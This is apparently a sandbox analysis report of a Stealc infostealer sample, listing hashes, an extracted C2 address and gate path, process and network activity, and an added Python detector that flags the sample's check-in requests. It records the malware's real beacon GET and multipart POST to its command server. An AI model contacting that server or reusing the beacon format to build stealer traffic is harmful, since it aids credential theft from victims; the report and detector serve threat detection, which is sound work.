Analysis

  • max time kernel
    93s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21-12-2024 12:24

General

  • Target

    ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe

  • Size

    289KB

  • MD5

    ea2c30769d298e35ba11cd5c5ed2b04f

  • SHA1

    e47bc5c3db4cfbc68dfbe6c48a88c87c29b38a13

  • SHA256

    ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8

  • SHA512

    5e8dd5244fd0c420c79aaf5c9aa7f112189696ae4f7caaa8082acff3e401df3d1d9f84ce4c8ef0c0a768fac4c2495afb192d72e40e2737b8144cb21adebaedb8

  • SSDEEP

    6144:UBM4zzQdbt97XKCVqSYkRYfeIUd+NHHDWn9mWhi:4M44dN3YWTITHDqBi

Malware Config

Extracted

Family

stealc

Botnet

LogsDiller

C2

http://185.219.81.132

Attributes
  • url_path

    /c3d039fb36c40339.php

Signatures

  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of the victim machine in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe
    "C:\Users\Admin\AppData\Local\Temp\ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:3996
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 1268
      2⤵
      • Program crash
      PID:1456
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 1264
      2⤵
      • Program crash
      PID:376
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 3996 -ip 3996
    1⤵
      PID:3392
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3996 -ip 3996
      1⤵
        PID:4516

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dns.google
      • flag-us
        DNS
        241.150.49.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.150.49.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.214.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.214.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-nl
        GET
        http://185.219.81.132/
        ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe
        Remote address:
        185.219.81.132:80
        Request
        GET / HTTP/1.1
        Host: 185.219.81.132
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Sat, 21 Dec 2024 12:24:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Content-Length: 0
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-nl
        POST
        http://185.219.81.132/c3d039fb36c40339.php
        ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe
        Remote address:
        185.219.81.132:80
        Request
        POST /c3d039fb36c40339.php HTTP/1.1
        Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG
        Host: 185.219.81.132
        Content-Length: 216
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Sat, 21 Dec 2024 12:24:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Content-Length: 8
        Keep-Alive: timeout=5, max=99
        Connection: Keep-Alive
        Content-Type: text/html; charset=UTF-8
      • flag-us
        DNS
        132.81.219.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        132.81.219.185.in-addr.arpa
        IN PTR
        Response
        132.81.219.185.in-addr.arpa
        IN PTR
        185-219-81-132 netherlands-2vpsac
      • flag-us
        DNS
        134.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        134.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        200.163.202.172.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        200.163.202.172.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        15.164.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        15.164.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        140.71.91.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        140.71.91.104.in-addr.arpa
        IN PTR
        Response
        140.71.91.104.in-addr.arpa
        IN PTR
        a104-91-71-140.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        88.210.23.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        88.210.23.2.in-addr.arpa
        IN PTR
        Response
        88.210.23.2.in-addr.arpa
        IN PTR
        a2-23-210-88.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        22.236.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        22.236.111.52.in-addr.arpa
        IN PTR
        Response
      • 185.219.81.132:80
        http://185.219.81.132/c3d039fb36c40339.php
        http
        ae5b9a35f35d710b849c3bfb37e848a129855768bd9929b7a85702de3e76e0c8_Sigmanly.exe
        822 B
        625 B
        7
        5

        HTTP Request

        GET http://185.219.81.132/

        HTTP Response

        200

        HTTP Request

        POST http://185.219.81.132/c3d039fb36c40339.php

        HTTP Response

        200
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
        90 B
        1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        241.150.49.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        241.150.49.20.in-addr.arpa

      • 8.8.8.8:53
        172.214.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.214.232.199.in-addr.arpa

      • 8.8.8.8:53
        132.81.219.185.in-addr.arpa
        dns
        73 B
        122 B
        1
        1

        DNS Request

        132.81.219.185.in-addr.arpa

      • 8.8.8.8:53
        134.32.126.40.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        134.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        58.55.71.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        58.55.71.13.in-addr.arpa

      • 8.8.8.8:53
        196.249.167.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        196.249.167.52.in-addr.arpa

      • 8.8.8.8:53
        200.163.202.172.in-addr.arpa
        dns
        74 B
        160 B
        1
        1

        DNS Request

        200.163.202.172.in-addr.arpa

      • 8.8.8.8:53
        15.164.165.52.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        15.164.165.52.in-addr.arpa

      • 8.8.8.8:53
        140.71.91.104.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        140.71.91.104.in-addr.arpa

      • 8.8.8.8:53
        88.210.23.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        88.210.23.2.in-addr.arpa

      • 8.8.8.8:53
        22.236.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        22.236.111.52.in-addr.arpa
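      The only traffic the sample itself generated is the GET / connectivity probe and the multipart POST to the gate script above; the process tree shows two WerFault crash handlers attached to PID 3996 and the POST body is 216 bytes with an 8-byte reply, so this run ends at the initial check-in rather than a full exfiltration. The following detector is an added example, not part of the sandbox report or the Stealc code base. The exact IOCs (C2 host and gate path) are taken from the extracted config; the structural heuristics (a /<16 hex>.php path, a multipart boundary of "----" plus 20 uppercase letters, a bare-IP Host header with no User-Agent) are assumptions generalised from the single request shown here, not a documented family-wide rule. The capture it runs over is constructed: the two requests from this report with a placeholder body, one beacon to a different address, and two benign requests.

```python
"""Flag Stealc-style C2 check-ins in a plain-text HTTP capture (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Known indicators from this report's extracted config.
C2_HOST = "185.219.81.132"
C2_PATH = "/c3d039fb36c40339.php"

# Heuristics: assumptions generalised from the one POST in this report.
GATE_PATH_RE = re.compile(r"^/[0-9a-f]{16}\.php$")          # /<16 lowercase hex>.php
BOUNDARY_RE = re.compile(r"boundary=----[A-Z]{20}$")         # ----<20 uppercase letters>
BARE_IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
REQUEST_LINE_RE = re.compile(r"^(GET|POST|PUT|HEAD) (\S+) HTTP/1\.[01]$")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)


@dataclass
class Hit:
    method: str
    path: str
    ioc: List[str]          # exact matches against the extracted config
    heuristics: List[str]   # structural traits shared with the observed beacon


def parse_requests(capture: str) -> List[HttpRequest]:
    """Split a text capture into requests; body lines after the blank line are skipped."""
    requests: List[HttpRequest] = []
    current, in_headers = None, False
    for raw in capture.splitlines():
        line = raw.strip()
        m = REQUEST_LINE_RE.match(line)
        if m:
            current = HttpRequest(m.group(1), m.group(2))
            requests.append(current)
            in_headers = True
        elif in_headers and line == "":
            in_headers = False
        elif in_headers and ":" in line:
            name, _, value = line.partition(":")
            current.headers[name.strip().lower()] = value.strip()
    return requests


def score_request(req: HttpRequest) -> Hit:
    ioc, heur = [], []
    host = req.headers.get("host", "")
    if host == C2_HOST:
        ioc.append(f"Host matches known C2 {C2_HOST}")
    if req.path == C2_PATH:
        ioc.append(f"path matches known gate {C2_PATH}")
    if req.method == "POST":
        if GATE_PATH_RE.match(req.path):
            heur.append("POST to /<16 hex>.php")
        if BOUNDARY_RE.search(req.headers.get("content-type", "")):
            heur.append("multipart boundary ----<20 uppercase letters>")
        if BARE_IPV4_RE.match(host) and "user-agent" not in req.headers:
            heur.append("bare-IP Host with no User-Agent")
    return Hit(req.method, req.path, ioc, heur)


def find_checkins(capture: str, min_heuristics: int = 2) -> List[Hit]:
    """Report a request on any exact IOC match, or on >= min_heuristics structural traits."""
    return [h for h in map(score_request, parse_requests(capture))
            if h.ioc or len(h.heuristics) >= min_heuristics]


# Constructed capture: the two requests from this report (body replaced by a
# placeholder), one beacon to a different host, and two benign requests.
SAMPLE_CAPTURE = """\
GET / HTTP/1.1
Host: 185.219.81.132
Connection: Keep-Alive

POST /c3d039fb36c40339.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG
Host: 185.219.81.132
Content-Length: 216
Connection: Keep-Alive

------JKEHIIJJECFHJKECFHDG
Content-Disposition: form-data; name="placeholder"

(constructed placeholder body; the report does not show the real one)
------JKEHIIJJECFHJKECFHDG--
POST /a1b2c3d4e5f60718.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ABCDEFGHIJABCDEFGHIJ
Host: 203.0.113.7
Content-Length: 100

GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0

POST /api/upload HTTP/1.1
Host: 10.0.0.5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: curl/8.4.0
Content-Length: 10
"""

if __name__ == "__main__":
    for hit in find_checkins(SAMPLE_CAPTURE):
        print(hit.method, hit.path, hit.ioc, hit.heuristics)
```

      Exact IOC matches are reported on their own because they are the highest-confidence signal; the structural traits are only reported when at least two of them coincide, which keeps an ordinary multipart upload to an internal IP from firing while still catching the same beacon shape pointed at a host not yet in the IOC list.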

      MITRE ATT&CK Enterprise v15

      Downloads

      • memory/3996-0-0x00000000001C0000-0x00000000001EB000-memory.dmp

        Filesize

        172KB

      • memory/3996-1-0x00000000022E0000-0x000000000231D000-memory.dmp

        Filesize

        244KB

      • memory/3996-2-0x0000000000400000-0x0000000000650000-memory.dmp

        Filesize

        2.3MB

      • memory/3996-5-0x00000000022E0000-0x000000000231D000-memory.dmp

        Filesize

        244KB

      • memory/3996-4-0x00000000001C0000-0x00000000001EB000-memory.dmp

        Filesize

        172KB

      • memory/3996-3-0x0000000000400000-0x0000000000650000-memory.dmp

        Filesize

        2.3MB